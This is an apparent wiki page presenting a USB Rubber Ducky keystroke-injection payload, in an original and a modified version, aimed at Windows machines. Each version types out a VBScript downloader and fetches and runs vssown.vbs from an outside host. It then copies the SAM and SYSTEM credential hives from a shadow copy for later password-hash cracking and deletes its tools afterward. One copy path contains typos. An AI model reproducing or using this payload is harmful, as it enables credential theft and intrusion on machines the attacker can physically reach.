Robot
/
wiki-rubber-ducky-usb
2
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
wiki-rubber-ducky-usb/Payload---retrieve-sam-and-...

130 lines
3.7 KiB
Plaintext
Raw Permalink Blame History

Author: Xcellerator
Duckncoder: 1.2
Target: Windows Machines (Servers and Workstations)
Teensy Version: http://pastebin.com/ufnLkbNX
Description: Uses a script called vssown.vbs to create a shadow file system and then retrieves the SAM and SYSTEM files for hash retrieval later on. Credit for DuckyDownloader script to Haysoos.
CODE
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING cd <DIRECTORY TO SAVE SAM AND SYSTEM TO>
ENTER
DELAY 200
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs
ENTER
DELAY 800
STRING del download.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 800
STRING cscript vssown.vbs /create
ENTER
DELAY 800
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING exit
ENTER
REM Make sure to change the DIRECTORY above.
Modifications made by overwraith, twin duck firmware, changes to ducky's SD card.
REM Modifications by overwraith
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY
REM TO DESIRED DIRECTORY WOULD HAVE GONE.
REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE.
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
ENTER
DELAY 800
STRING cd %DUCKYdrive%
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs
ENTER
DELAY 800
STRING del download.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 800
STRING cscript vssown.vbs /create
ENTER
DELAY 800
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING exit
ENTER
REM Make sure to change the DIRECTORY above.
Reference in New Issue View Git Blame Copy Permalink